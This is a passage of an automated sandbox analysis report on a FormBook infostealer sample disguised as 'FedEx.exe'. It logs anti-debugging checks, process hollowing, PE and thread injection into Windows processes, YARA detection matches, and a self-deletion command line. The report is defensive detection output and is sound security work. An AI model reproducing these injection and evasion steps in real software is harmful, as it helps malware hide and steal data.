          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BCFE87 mov eax, dword ptr fs:[00000030h]20_2_04BCFE87
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B616E0 mov ecx, dword ptr fs:[00000030h]20_2_04B616E0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B476E2 mov eax, dword ptr fs:[00000030h]20_2_04B476E2
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C00EA5 mov eax, dword ptr fs:[00000030h]20_2_04C00EA5
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C00EA5 mov eax, dword ptr fs:[00000030h]20_2_04C00EA5
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C00EA5 mov eax, dword ptr fs:[00000030h]20_2_04C00EA5
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B78EC7 mov eax, dword ptr fs:[00000030h]20_2_04B78EC7
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B636CC mov eax, dword ptr fs:[00000030h]20_2_04B636CC
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BEFEC0 mov eax, dword ptr fs:[00000030h]20_2_04BEFEC0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BEFE3F mov eax, dword ptr fs:[00000030h]20_2_04BEFE3F
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B3E620 mov eax, dword ptr fs:[00000030h]20_2_04B3E620
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6A61C mov eax, dword ptr fs:[00000030h]20_2_04B6A61C
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6A61C mov eax, dword ptr fs:[00000030h]20_2_04B6A61C
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B3C600 mov eax, dword ptr fs:[00000030h]20_2_04B3C600
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B3C600 mov eax, dword ptr fs:[00000030h]20_2_04B3C600
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B3C600 mov eax, dword ptr fs:[00000030h]20_2_04B3C600
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B68E00 mov eax, dword ptr fs:[00000030h]20_2_04B68E00
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF1608 mov eax, dword ptr fs:[00000030h]20_2_04BF1608
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B5AE73 mov eax, dword ptr fs:[00000030h]20_2_04B5AE73
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B5AE73 mov eax, dword ptr fs:[00000030h]20_2_04B5AE73
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B5AE73 mov eax, dword ptr fs:[00000030h]20_2_04B5AE73
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B5AE73 mov eax, dword ptr fs:[00000030h]20_2_04B5AE73
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B5AE73 mov eax, dword ptr fs:[00000030h]20_2_04B5AE73
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B4766D mov eax, dword ptr fs:[00000030h]20_2_04B4766D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B47E41 mov eax, dword ptr fs:[00000030h]20_2_04B47E41
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B47E41 mov eax, dword ptr fs:[00000030h]20_2_04B47E41
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B47E41 mov eax, dword ptr fs:[00000030h]20_2_04B47E41
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B47E41 mov eax, dword ptr fs:[00000030h]20_2_04B47E41
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B47E41 mov eax, dword ptr fs:[00000030h]20_2_04B47E41
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B47E41 mov eax, dword ptr fs:[00000030h]20_2_04B47E41
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BFAE44 mov eax, dword ptr fs:[00000030h]20_2_04BFAE44
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BFAE44 mov eax, dword ptr fs:[00000030h]20_2_04BFAE44
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B48794 mov eax, dword ptr fs:[00000030h]20_2_04B48794
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB7794 mov eax, dword ptr fs:[00000030h]20_2_04BB7794
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB7794 mov eax, dword ptr fs:[00000030h]20_2_04BB7794
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB7794 mov eax, dword ptr fs:[00000030h]20_2_04BB7794
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B737F5 mov eax, dword ptr fs:[00000030h]20_2_04B737F5
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6E730 mov eax, dword ptr fs:[00000030h]20_2_04B6E730
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B5B73D mov eax, dword ptr fs:[00000030h]20_2_04B5B73D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B5B73D mov eax, dword ptr fs:[00000030h]20_2_04B5B73D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B34F2E mov eax, dword ptr fs:[00000030h]20_2_04B34F2E
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B34F2E mov eax, dword ptr fs:[00000030h]20_2_04B34F2E
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B5F716 mov eax, dword ptr fs:[00000030h]20_2_04B5F716
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C08F6A mov eax, dword ptr fs:[00000030h]20_2_04C08F6A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BCFF10 mov eax, dword ptr fs:[00000030h]20_2_04BCFF10
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BCFF10 mov eax, dword ptr fs:[00000030h]20_2_04BCFF10
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6A70E mov eax, dword ptr fs:[00000030h]20_2_04B6A70E
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6A70E mov eax, dword ptr fs:[00000030h]20_2_04B6A70E
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C0070D mov eax, dword ptr fs:[00000030h]20_2_04C0070D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C0070D mov eax, dword ptr fs:[00000030h]20_2_04C0070D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B4FF60 mov eax, dword ptr fs:[00000030h]20_2_04B4FF60
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B4EF40 mov eax, dword ptr fs:[00000030h]20_2_04B4EF40
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6F0BF mov ecx, dword ptr fs:[00000030h]20_2_04B6F0BF
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6F0BF mov eax, dword ptr fs:[00000030h]20_2_04B6F0BF
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6F0BF mov eax, dword ptr fs:[00000030h]20_2_04B6F0BF
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B620A0 mov eax, dword ptr fs:[00000030h]20_2_04B620A0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B620A0 mov eax, dword ptr fs:[00000030h]20_2_04B620A0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B620A0 mov eax, dword ptr fs:[00000030h]20_2_04B620A0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B620A0 mov eax, dword ptr fs:[00000030h]20_2_04B620A0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B620A0 mov eax, dword ptr fs:[00000030h]20_2_04B620A0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B620A0 mov eax, dword ptr fs:[00000030h]20_2_04B620A0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B790AF mov eax, dword ptr fs:[00000030h]20_2_04B790AF
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B39080 mov eax, dword ptr fs:[00000030h]20_2_04B39080
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB3884 mov eax, dword ptr fs:[00000030h]20_2_04BB3884
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB3884 mov eax, dword ptr fs:[00000030h]20_2_04BB3884
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B5B8E4 mov eax, dword ptr fs:[00000030h]20_2_04B5B8E4
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B5B8E4 mov eax, dword ptr fs:[00000030h]20_2_04B5B8E4
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B340E1 mov eax, dword ptr fs:[00000030h]20_2_04B340E1
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B340E1 mov eax, dword ptr fs:[00000030h]20_2_04B340E1
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B340E1 mov eax, dword ptr fs:[00000030h]20_2_04B340E1
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B358EC mov eax, dword ptr fs:[00000030h]20_2_04B358EC
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BCB8D0 mov eax, dword ptr fs:[00000030h]20_2_04BCB8D0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BCB8D0 mov ecx, dword ptr fs:[00000030h]20_2_04BCB8D0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BCB8D0 mov eax, dword ptr fs:[00000030h]20_2_04BCB8D0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BCB8D0 mov eax, dword ptr fs:[00000030h]20_2_04BCB8D0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BCB8D0 mov eax, dword ptr fs:[00000030h]20_2_04BCB8D0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BCB8D0 mov eax, dword ptr fs:[00000030h]20_2_04BCB8D0
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B5A830 mov eax, dword ptr fs:[00000030h]20_2_04B5A830
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B5A830 mov eax, dword ptr fs:[00000030h]20_2_04B5A830
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B5A830 mov eax, dword ptr fs:[00000030h]20_2_04B5A830
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B5A830 mov eax, dword ptr fs:[00000030h]20_2_04B5A830
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6002D mov eax, dword ptr fs:[00000030h]20_2_04B6002D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6002D mov eax, dword ptr fs:[00000030h]20_2_04B6002D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6002D mov eax, dword ptr fs:[00000030h]20_2_04B6002D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6002D mov eax, dword ptr fs:[00000030h]20_2_04B6002D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B6002D mov eax, dword ptr fs:[00000030h]20_2_04B6002D
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B4B02A mov eax, dword ptr fs:[00000030h]20_2_04B4B02A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B4B02A mov eax, dword ptr fs:[00000030h]20_2_04B4B02A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B4B02A mov eax, dword ptr fs:[00000030h]20_2_04B4B02A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B4B02A mov eax, dword ptr fs:[00000030h]20_2_04B4B02A
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB7016 mov eax, dword ptr fs:[00000030h]20_2_04BB7016
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB7016 mov eax, dword ptr fs:[00000030h]20_2_04BB7016
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB7016 mov eax, dword ptr fs:[00000030h]20_2_04BB7016
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C01074 mov eax, dword ptr fs:[00000030h]20_2_04C01074
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BF2073 mov eax, dword ptr fs:[00000030h]20_2_04BF2073
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C04015 mov eax, dword ptr fs:[00000030h]20_2_04C04015
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04C04015 mov eax, dword ptr fs:[00000030h]20_2_04C04015
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B50050 mov eax, dword ptr fs:[00000030h]20_2_04B50050
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B50050 mov eax, dword ptr fs:[00000030h]20_2_04B50050
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB51BE mov eax, dword ptr fs:[00000030h]20_2_04BB51BE
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB51BE mov eax, dword ptr fs:[00000030h]20_2_04BB51BE
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB51BE mov eax, dword ptr fs:[00000030h]20_2_04BB51BE
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04BB51BE mov eax, dword ptr fs:[00000030h]20_2_04BB51BE
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B599BF mov ecx, dword ptr fs:[00000030h]20_2_04B599BF
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B599BF mov ecx, dword ptr fs:[00000030h]20_2_04B599BF
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B599BF mov eax, dword ptr fs:[00000030h]20_2_04B599BF
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B599BF mov ecx, dword ptr fs:[00000030h]20_2_04B599BF
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B599BF mov ecx, dword ptr fs:[00000030h]20_2_04B599BF
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B599BF mov eax, dword ptr fs:[00000030h]20_2_04B599BF
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B599BF mov ecx, dword ptr fs:[00000030h]20_2_04B599BF
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B599BF mov ecx, dword ptr fs:[00000030h]20_2_04B599BF
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B599BF mov eax, dword ptr fs:[00000030h]20_2_04B599BF
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B599BF mov ecx, dword ptr fs:[00000030h]20_2_04B599BF
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B599BF mov ecx, dword ptr fs:[00000030h]20_2_04B599BF
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_04B599BF mov eax, dword ptr fs:[00000030h]20_2_04B599BF
          Source: C:\Windows\SysWOW64\logagent.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\DpiScaling.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 8_2_051F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_051F9910

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Sample uses process hollowing technique
          Source: C:\Windows\SysWOW64\logagent.exeSection unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: F70000Jump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeSection unmapped: C:\Windows\SysWOW64\mstsc.exe base address: C80000Jump to behavior
          Source: C:\Windows\SysWOW64\DpiScaling.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: AE0000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Windows\SysWOW64\logagent.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\DpiScaling.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\DpiScaling.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\DpiScaling.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\FedEx.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 10410000Jump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 3100000Jump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 3110000Jump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 10410000Jump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: AE0000Jump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: AF0000Jump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 10410000Jump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: DC0000Jump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: DD0000Jump to behavior
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\FedEx.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 10410000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 3100000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 3110000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: 10410000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: AE0000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeMemory allocated: C:\Windows\SysWOW64\logagent.exe base: AF0000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: 10410000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: DC0000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeMemory allocated: C:\Windows\SysWOW64\DpiScaling.exe base: DD0000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\FedEx.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 10410000 value starts with: 4D5AJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 10410000 value starts with: 4D5AJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 10410000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\logagent.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\logagent.exeThread register set: target process: 684Jump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeThread register set: target process: 684Jump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeThread register set: target process: 684Jump to behavior
          Source: C:\Windows\SysWOW64\DpiScaling.exeThread register set: target process: 684Jump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeThread register set: target process: 684Jump to behavior
          Creates a thread in another existing process (thread injection)
          Source: C:\Users\user\Desktop\FedEx.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 3110000Jump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: AF0000Jump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeThread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: DD0000Jump to behavior
          Source: C:\Users\user\Desktop\FedEx.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exeJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exeJump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exeJump to behavior
          Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\logagent.exe"Jump to behavior
          Source: C:\Users\Public\Libraries\Rvsuben.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 20.0.logagent.exe.10410000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.logagent.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.logagent.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.10410000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.DpiScaling.exe.10410000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.DpiScaling.exe.10410000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000001F.00000002.662948879.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.643656925.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.600971102.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.663406978.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.622514268.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.601348197.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.696412101.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.639113956.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.601926446.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.627979202.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.658059430.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.478775786.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.479688839.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.658204539.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.640834589.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.583342582.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.601178673.000000000F23E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.582254970.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.639730390.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.550265684.000000000F23E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.622677419.00000000033E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.582967305.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.600603050.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.479381669.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.696533789.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.479097118.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000000.582561192.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.695229674.0000000000E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 20.0.logagent.exe.10410000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.logagent.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.logagent.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 20.0.logagent.exe.10410000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.DpiScaling.exe.10410000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.DpiScaling.exe.10410000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000001F.00000002.662948879.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.643656925.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.600971102.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.663406978.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.622514268.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.601348197.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.696412101.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.639113956.00000000011E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.601926446.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.627979202.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
